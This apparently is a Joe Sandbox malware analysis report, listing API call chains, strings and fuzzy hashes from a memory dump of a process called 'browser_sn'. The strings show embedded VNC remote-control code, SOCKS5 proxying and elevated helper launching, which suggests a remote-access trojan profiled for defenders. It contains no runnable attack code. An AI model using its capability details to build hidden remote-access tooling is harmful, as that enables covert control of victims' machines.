                                                                              • Part of subcall function 00007FF6C2B8A040: GetCurrentThreadId.KERNEL32 ref: 00007FF6C2B8A083
                                                                              • Part of subcall function 00007FF6C2B8A040: GetThreadDesktop.USER32(?,?,?,00007FF6C2B882D7), ref: 00007FF6C2B8A08B
                                                                              • Part of subcall function 00007FF6C2B8A040: SetThreadDesktop.USER32(?,?,?,00007FF6C2B882D7), ref: 00007FF6C2B8A0A6
                                                                              • Part of subcall function 00007FF6C2B8A040: MessageBoxA.USER32 ref: 00007FF6C2B8A0B7
                                                                              • Part of subcall function 00007FF6C2B8A040: SetThreadDesktop.USER32(?,?,?,00007FF6C2B882D7), ref: 00007FF6C2B8A0C2
                                                                              • Part of subcall function 00007FF6C2B8A040: CloseDesktop.USER32(?,?,?,00007FF6C2B882D7), ref: 00007FF6C2B8A0CB
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Desktop$Thread$CapsDevice$CloseCurrentInputMessageOpen
                                                                            • String ID: WinVNC$vncDesktop : current display is PLANAR, not CHUNKY!WinVNC cannot be used with this graphics device driver$vncdesktop.cpp : DBG:display context has %d planes!$vncdesktop.cpp : DBG:memory context has %d planes!
                                                                            • API String ID: 3271485511-23260621
                                                                            • Opcode ID: aceaff558d4e77a2f2eec4c4dc82cdcf6baf6394409946313555329e23b774f0
                                                                            • Instruction ID: b039628b68cc13aa1fe4a0970416290fd62c20453433962459e2d32e7d1fa5f9
                                                                            • Opcode Fuzzy Hash: aceaff558d4e77a2f2eec4c4dc82cdcf6baf6394409946313555329e23b774f0
                                                                            • Instruction Fuzzy Hash: A7218C766081C285E7048FB5C8407F82761EF69B0EF480436CE8CDA799DEACD196C324
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Thread$Desktop$CurrentInformationObjectUser
                                                                            • String ID: vncservice.cpp : !GetUserObjectInformation $vncservice.cpp : SelectHDESK to %s (%x) from %x$vncservice.cpp : SelectHDESK:!SetThreadDesktop
                                                                            • API String ID: 3041254040-2700308907
                                                                            • Opcode ID: 4f8d2c7db47c5d763c9f183b5bfa44873fa21b71b4771b800020d903ae877d61
                                                                            • Instruction ID: a426129472c600fb62c501d9b4d2c71121ca81128c9d90e506acbecfe9a354a9
                                                                            • Opcode Fuzzy Hash: 4f8d2c7db47c5d763c9f183b5bfa44873fa21b71b4771b800020d903ae877d61
                                                                            • Instruction Fuzzy Hash: A4211A35A08A8281EBA09F51A8053E663B4BF8A74EF840072DECE86754DEBCE055C740
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CriticalSection$EnterLeave$ErrorLastObjectSingleValueWait
                                                                            • String ID:
                                                                            • API String ID: 3883107862-0
                                                                            • Opcode ID: 2d3a207cf1e61dbd628a562107760b45f8588eac2b273cc230bde13b8ab52e88
                                                                            • Instruction ID: a321bcab2be3f20a920f8acfc4bf275f0b112919d68aa2dbfc88dcda8ed71258
                                                                            • Opcode Fuzzy Hash: 2d3a207cf1e61dbd628a562107760b45f8588eac2b273cc230bde13b8ab52e88
                                                                            • Instruction Fuzzy Hash: A8310636A08B4286EB90DF20E4452A973B0FB98B99F440532CF8D83765CFBCE499C740
                                                                            APIs
                                                                              • Part of subcall function 00007FF6C2C437C4: GetLastError.KERNEL32(?,?,?,00007FF6C2C3FFD1,?,?,?,?,00007FF6C2C38C19,?,?,?,00007FF6C2C3748C), ref: 00007FF6C2C437CE
                                                                              • Part of subcall function 00007FF6C2C437C4: FlsGetValue.KERNEL32(?,?,?,00007FF6C2C3FFD1,?,?,?,?,00007FF6C2C38C19,?,?,?,00007FF6C2C3748C), ref: 00007FF6C2C437DC
                                                                              • Part of subcall function 00007FF6C2C437C4: FlsSetValue.KERNEL32(?,?,?,00007FF6C2C3FFD1,?,?,?,?,00007FF6C2C38C19,?,?,?,00007FF6C2C3748C), ref: 00007FF6C2C43808
                                                                              • Part of subcall function 00007FF6C2C437C4: GetCurrentThreadId.KERNEL32 ref: 00007FF6C2C4381C
                                                                              • Part of subcall function 00007FF6C2C437C4: SetLastError.KERNEL32(?,?,?,00007FF6C2C3FFD1,?,?,?,?,00007FF6C2C38C19,?,?,?,00007FF6C2C3748C), ref: 00007FF6C2C43834
                                                                              • Part of subcall function 00007FF6C2C432EC: Sleep.KERNEL32(?,?,?,00007FF6C2C437F7,?,?,?,00007FF6C2C3FFD1,?,?,?,?,00007FF6C2C38C19), ref: 00007FF6C2C43331
                                                                            • _errno.LIBCMT ref: 00007FF6C2C49D9C
                                                                            • _invalid_parameter_noinfo.LIBCMT ref: 00007FF6C2C49DA7
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: ErrorLastValue$CurrentSleepThread_errno_invalid_parameter_noinfo
                                                                            • String ID: ;$;$JanFebMarAprMayJunJulAugSepOctNovDec$gfff
                                                                            • API String ID: 1962487656-880385205
                                                                            • Opcode ID: e0d79e7de24b8caf00c283af6be9bb86cffb6513b752dbb336f62d487cff5387
                                                                            • Instruction ID: 770f264e69002573919cad4cb9d160e93397721197c579b2cf8b87761c129e56
                                                                            • Opcode Fuzzy Hash: e0d79e7de24b8caf00c283af6be9bb86cffb6513b752dbb336f62d487cff5387
                                                                            • Instruction Fuzzy Hash: A19104736041918BEB99CE38C4946A93BB1D7A1709F08C135DF88CB796DE79E509C742
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: recv$send$_errno_invalid_parameter_noinfo_wgetenv
                                                                            • String ID: SOCKS5_AUTH
                                                                            • API String ID: 788663964-1698957378
                                                                            • Opcode ID: a52017378aba2792d1574ce981dd4d2621b7e1f64bedfacb3fbf5eec73a6fd49
                                                                            • Instruction ID: 6f46347282f7a980984c9ce4fb8ceb10c2042237436bdc8751b8c3c5e3e88078
                                                                            • Opcode Fuzzy Hash: a52017378aba2792d1574ce981dd4d2621b7e1f64bedfacb3fbf5eec73a6fd49
                                                                            • Instruction Fuzzy Hash: D7812C6271C74380E7A48F29A5406BA6791EF8679EF445132EEDDC7BC5EEACE405C700
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CriticalSection$InitializeLeave$EnterExceptionRaisemalloc
                                                                            • String ID: P$vncclient.cpp : init update thread
                                                                            • API String ID: 1414418286-2218817233
                                                                            • Opcode ID: a2ddf4542d68b33c97d8dd45c1d4527320b6cb60f175d7e18664f7ad04aba2c8
                                                                            • Instruction ID: e92e7fb1370cc92918af48e6078a16ecbbfb535d25f9c05107978827c8d00d7d
                                                                            • Opcode Fuzzy Hash: a2ddf4542d68b33c97d8dd45c1d4527320b6cb60f175d7e18664f7ad04aba2c8
                                                                            • Instruction Fuzzy Hash: 9C411B32609B8186D7949F25E4503AD73A0FB49B99F484136DBDE83B94DFBCE468C301
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CriticalSection$EnterInitializeLeaveSleep
                                                                            • String ID: keyEvent$start_event$stop_event
                                                                            • API String ID: 2894921085-1979648887
                                                                            • Opcode ID: 5e942cff42221011ccb8e3385eb1f8bb143b44ab75859811ab11e89d6bfbc5a3
                                                                            • Instruction ID: 14403f335047290e7002dec8ab9dff17c0eafc46ee1a828d754f7b8649280a18
                                                                            • Opcode Fuzzy Hash: 5e942cff42221011ccb8e3385eb1f8bb143b44ab75859811ab11e89d6bfbc5a3
                                                                            • Instruction Fuzzy Hash: 88410860E1DA4381FB50AF16B4947B527A0AFA674EF400135DECEC7BA2CEACA494D351
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: LibraryMetricsSystem$DisplayEnumSettings$AddressFreeLoadProc
                                                                            • String ID:
                                                                            • API String ID: 3112530957-0
                                                                            • Opcode ID: 8e670c82803b1e3d87f37cd23dd2564999404595f46980b38d1fcce0b4863635
                                                                            • Instruction ID: 1174e1247f028eab76e2381e418727856b35746785636ff3df03f0355b498f5d
                                                                            • Opcode Fuzzy Hash: 8e670c82803b1e3d87f37cd23dd2564999404595f46980b38d1fcce0b4863635
                                                                            • Instruction Fuzzy Hash: 9E41F4729086C18AE364DF34E445699BBB0F748B19F444939EF999B788DF78E5048F20
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CriticalSection$CloseDeleteEnterFileHandleLeave
                                                                            • String ID: !UVNCDIR-$f
                                                                            • API String ID: 753559762-4271271459
                                                                            • Opcode ID: ec94c065237d398f8d62b421f4d082ca1b1a587006caf467a8040e51e14df5ee
                                                                            • Instruction ID: 6aab0a4faf812e65133bfcc9651ed94b652701610e8d4c6b69101f1e2bcb43f3
                                                                            • Opcode Fuzzy Hash: ec94c065237d398f8d62b421f4d082ca1b1a587006caf467a8040e51e14df5ee
                                                                            • Instruction Fuzzy Hash: 8A417E21A08A8181EB909F24E8543A937A0EB85BAEF140335DFAE8B7D5DF7CD045C751
                                                                            APIs
                                                                              • Part of subcall function 00007FF6C2C37BF0: GetSystemTimeAsFileTime.KERNEL32(?,?,?,00007FF6C2BD3771), ref: 00007FF6C2C37BFE
                                                                            • GetLastError.KERNEL32 ref: 00007FF6C2BD3790
                                                                            • SetLastError.KERNEL32 ref: 00007FF6C2BD37B2
                                                                            • FormatMessageA.KERNEL32 ref: 00007FF6C2BD37EB
                                                                            • sprintf.LIBCMT ref: 00007FF6C2BD3804
                                                                              • Part of subcall function 00007FF6C2C3B240: _errno.LIBCMT ref: 00007FF6C2C3B258
                                                                              • Part of subcall function 00007FF6C2C3B240: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6C2C3B263
                                                                              • Part of subcall function 00007FF6C2BD3690: OutputDebugStringA.KERNEL32(?,?,?,?,?,00007FF6C2BD385F), ref: 00007FF6C2BD36A9
                                                                              • Part of subcall function 00007FF6C2BD3690: GetStdHandle.KERNEL32(?,?,?,?,?,00007FF6C2BD385F), ref: 00007FF6C2BD36D1
                                                                              • Part of subcall function 00007FF6C2BD3690: WriteConsoleA.KERNEL32 ref: 00007FF6C2BD36EE
                                                                              • Part of subcall function 00007FF6C2BD3690: WriteFile.KERNEL32(?,?,?,?,?,00007FF6C2BD385F), ref: 00007FF6C2BD3725
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: ErrorFileLastTimeWrite$ConsoleDebugFormatHandleMessageOutputStringSystem_errno_invalid_parameter_noinfosprintf
                                                                            • String ID: --$error code 0x%08X
                                                                            • API String ID: 1897734068-3878996968
                                                                            • Opcode ID: efd08b52188bb8304a99cb4b7993a8a97ecc2afbd75597a5911adc055181aade
                                                                            • Instruction ID: 5b3a30745242a8955137dd7ddaa58d4c522f4583e6e0a66b503aa852b6bcf967
                                                                            • Opcode Fuzzy Hash: efd08b52188bb8304a99cb4b7993a8a97ecc2afbd75597a5911adc055181aade
                                                                            • Instruction Fuzzy Hash: 5331A076608A8281EB60CF21E4507AA6760FB85BADF544335EF9D877C9DF7DE0158B00
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: freeinet_addrmalloc
                                                                            • String ID: 0123456789.$both$local$remote
                                                                            • API String ID: 2387382576-3366603569
                                                                            • Opcode ID: c0e91ff71c9c1b6fadc6fcdf247a3b57fa66267f63b9c525a4ac725aaf56df2e
                                                                            • Instruction ID: d5d083eae4b0f9e56fe702e37ca92d70edd886374680073ed5b1b67607b8511b
                                                                            • Opcode Fuzzy Hash: c0e91ff71c9c1b6fadc6fcdf247a3b57fa66267f63b9c525a4ac725aaf56df2e
                                                                            • Instruction Fuzzy Hash: F821A021A0C78241F7509F1199503B866A1FB897DAF589532DE9DCB7C5EEFCE9918300
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: ExecuteFileModuleNameShellfclose
                                                                            • String ID: \uvnckeyboardhelper.exe$p$runas
                                                                            • API String ID: 3322125093-2954907143
                                                                            • Opcode ID: 037d2c38e5ac395d24b8413dad22403111c8ed725fed3ca7cb3e142dbe59519c
                                                                            • Instruction ID: 133d44601586d592b8796a11a6dce6900aaf49e8286247debb06164bcac8d22f
                                                                            • Opcode Fuzzy Hash: 037d2c38e5ac395d24b8413dad22403111c8ed725fed3ca7cb3e142dbe59519c
                                                                            • Instruction Fuzzy Hash: 1F31D835608B8285EAA09F10F4913AA73B4FB88759F804636DEDD83B99DF7CE115CB00
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
